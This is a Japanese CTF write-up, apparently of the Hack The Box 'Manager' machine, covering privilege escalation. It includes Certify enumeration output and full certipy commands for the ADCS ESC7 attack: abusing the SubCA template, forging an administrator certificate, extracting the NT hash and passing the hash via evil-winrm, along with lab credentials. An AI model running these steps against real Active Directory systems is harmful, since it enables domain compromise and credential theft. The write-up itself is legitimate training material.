┃ ~~~ PrivescCheck Summary ~~~ ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
TA0003 - Persistence
-
UEFI & Secure Boot →
Low
(2 finding
s)
TA0004 - Privilege Escalation
-
Driver co-installers →
Low
(1 finding
)
TA0006 - Credential Access
-
Credential Guard →
Low
(1 finding
)
-
LSA Protection →
Low
(1 finding
)
TA0008 - Lateral Movement
-
LAPS →
Medium
(1 finding
)
-
UAC settings →
Low
(3 finding
s)
Warning: To get more info, run this script with the option '-Extended'.
ここら辺を試してみてもいいが、それよりやはり、certsrvが気になるだろう。
一応psでも確認しておく。
あった!
Certify
Certifyで脆弱な証明書を確認します。
*Evil-WinRM* PS C:\Users\Raven\Documents> ./Certify.exe find /vulnarable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ |__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'
[*] Listing info about the Enterprise CA 'manager-DC01-CA'
Enterprise CA Name : manager-DC01-CA
DNS Hostname : dc01.manager.htb
FullName : dc01.manager.htb\manager-DC01-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=manager-DC01-CA, DC=manager, DC=htb
Cert Thumbprint : ACE850A2892B1614526F7F2151EE76E752415023
Cert Serial : 5150CE6EC048749448C7390A52F264BB
Cert Start Date : 7/27/2023 3:21:05 AM
Cert End Date : 7/27/2122 3:31:04 AM
Cert Chain : CN=manager-DC01-CA,DC=manager,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Deny ManageCA, Read MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Allow ManageCA, Enroll MANAGER\Raven S-1-5-21-4078382237-1492182817-2568127209-1116
Allow Enroll MANAGER\Operator S-1-5-21-4078382237-1492182817-2568127209-1119
Enrollment Agent Restrictions : None
[*] Available Certificates Templates :
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Encrypting File System
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : EFSRecovery
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : File Recovery
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : Machine
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Computers S-1-5-21-4078382237-1492182817-2568127209-515
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainController
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : SubCA
Schema Version : 1
Validity Period : 5 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : <null>
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DomainControllerAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : DirectoryEmailReplication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Directory Service Email Replication
mspki-certificate-application-policy : Directory Service Email Replication
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
CA Name : dc01.manager.htb\manager-DC01-CA
Template Name : KerberosAuthentication
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
mspki-certificate-application-policy : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
Permissions
Enrollment Permissions
Enrollment Rights : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Domain Controllers S-1-5-21-4078382237-1492182817-2568127209-516
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
MANAGER\Enterprise Read-only Domain ControllersS-1-5-21-4078382237-1492182817-2568127209-498
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
Object Control Permissions
Owner : MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteOwner Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : MANAGER\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
MANAGER\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:08.5889780
デフォルトである証明書が多いが気になるものがある。
SubCAである。これは以下のHackTricksのADCSのドメイン昇格法を読み込んだ人ならばESC7 - Attack2を実践できそうであることがわかるかと思う。
The technique relies on the fact that users with the Manage CA and Manage Certificates access right can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enroll in the template. Thus, a user can request to enroll in the SubCA - which will be denied - but then issued by the manager afterwards.
これはCAへのアクセス権が必要になるが、まぁやってみる価値はあると思う。
最初のコマンドが失敗すればアクセス権がないとなってほかの攻撃ベクトルを探るだけだ。
ADCS - ESC7
CAへのアクセス権があるかどうか確認しつつ、失敗するリクエストのIDを控えに行きます。
┌──(root㉿kali)-[~/work]
└─# certipy ca -ca 'manager-DC01-CA' -add-officer raven -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn 'administrator@manager.htb' -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.144.30:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[+] Trying to get DCOM connection for: 10.129.144.30
[*] User 'Raven' already has officer rights on 'manager-DC01-CA'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Trying to get DCOM connection for: 10.129.144.30
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.129.144.30:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc01.manager.htb' at '192.168.40.1'
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 14
Would you like to save the private key? (y/N) y
[*] Saved private key to 14.key
[-] Failed to request certificate
いけました!
このIDで再度CAから発行された証明書を取りに行きます。
失敗するときはntpdate 10.129.144.30と打ってBOXと時刻を同期します。
┌──(root㉿kali)-[~/work]
└─# certipy ca -ca 'manager-DC01-CA' -issue-request 14 -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -debug && certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 14 -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[+] Resolved 'MANAGER.HTB' from cache: 10.129.144.30
[+] Trying to get DCOM connection for: 10.129.144.30
[-] Got access denied trying to issue certificate
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'dc01.manager.htb' at '192.168.40.1'
[+] Trying to resolve 'MANAGER.HTB' at '192.168.40.1'
[*] Rerieving certificate with ID 14
[+] Trying to connect to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.144.30[\pipe\cert]
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '14.key'
[*] Saved certificate and private key to 'administrator.pfx'
証明書を取れました。これで認証します。
失敗する場合は上記同様にntpdateします。
┌──(root㉿kali)-[~/work]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.144.30
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
ハッシュが取れたのでPTHします!
┌──(root㉿kali)-[~]
└─# evil-winrm -i 10.129.144.30 -u Administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
これでAdminのフラグを奪取できました!
まとめ
これで特権昇格に成功し、Administrator権限を奪取できました。
総当たり嫌いマンなので初手が一番キツカッタです。
それ以降はADCSでの権限昇格だったのでスラスラいけました。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。